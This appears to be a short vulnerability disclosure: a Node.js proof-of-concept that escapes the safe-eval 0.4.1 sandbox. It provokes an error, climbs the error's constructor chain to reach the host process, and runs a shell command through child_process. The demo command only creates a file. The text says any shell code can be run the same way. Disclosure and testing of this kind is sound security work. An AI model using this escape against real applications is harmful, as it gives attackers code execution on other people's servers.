// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')
let code = ` (function() {
try{
__defineGetter__("x", );
} catch(ret){
ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}}
)()
`
safeEval(code);Sandbox can be escaped by prototype pollution by calling __defineGetter__ function.
Also, we can execute arbitrary shell code using process module.
Sandbox can be escaped by prototype pollution by calling
__defineGetter__function.Also, we can execute arbitrary shell code using process module.